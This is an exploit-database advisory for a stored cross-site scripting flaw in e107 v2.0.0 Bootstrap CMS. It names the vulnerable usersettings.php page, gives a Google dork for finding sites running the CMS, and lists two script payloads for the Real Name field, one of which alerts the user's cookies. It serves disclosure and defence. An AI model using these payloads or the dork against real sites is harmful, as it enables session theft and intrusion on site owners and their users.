e107 v2 Bootstrap CMS XSS Vulnerability

vendor:

e107 Bootstrap CMS

by:

Ahmet Agar

7.5

CVSS

HIGH

XSS

CWE

Product Name: e107 Bootstrap CMS

Affected Version From: 2.0.0

Affected Version To: 2.0.0

Patch Exists: NO

Related CWE: N/A

CPE: e107:e107_bootstrap

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: OWASP Mantra & Iceweasel

2014

e107 v2 Bootstrap CMS XSS Vulnerability

CMS user details section is vulnerable to XSS. You can run XSS payloads. Go to the Update user settings page and set the Real Name value to '><script>alert(String.fromCharCode(88, 83, 83))</script>' or '><script>alert(document.cookie)</script>'

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

 _____       _____  ______
|  _  |     |  _  ||___  /
| |/' |_  __| |_| |   / / 
|  /| \ \/ /\____ |  / /  
\ |_/ />  < .___/ /./ /   
 \___//_/\_\\____/ \_/    
                        by bl4ck s3c


# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
# Date: 03-01-2014
# Google Dork : Proudly powered by e107 
# Exploit Author: Ahmet Agar / 0x97
# Version: 2.0.0
# Vendor Homepage: http://e107.org/
# Tested on: OWASP Mantra & Iceweasel
 
# Vulnerability Description:

CMS user details section is vulnerable to XSS. You can run XSS payloads.

XSS Vulnerability #1:

Go Update user settings page

"http://{target-url}/usersettings.php"

Set Real Name value;

"><script>alert(String.fromCharCode(88, 83, 83))</script>

or

"><script>alert(document.cookie)</script>


========
Credits:
========
 
Vulnerability found and advisory written by Ahmet Agar.
 
===========
References:
===========
 
http://www.0x97.info
htts://twitter.com/_HacKingZ_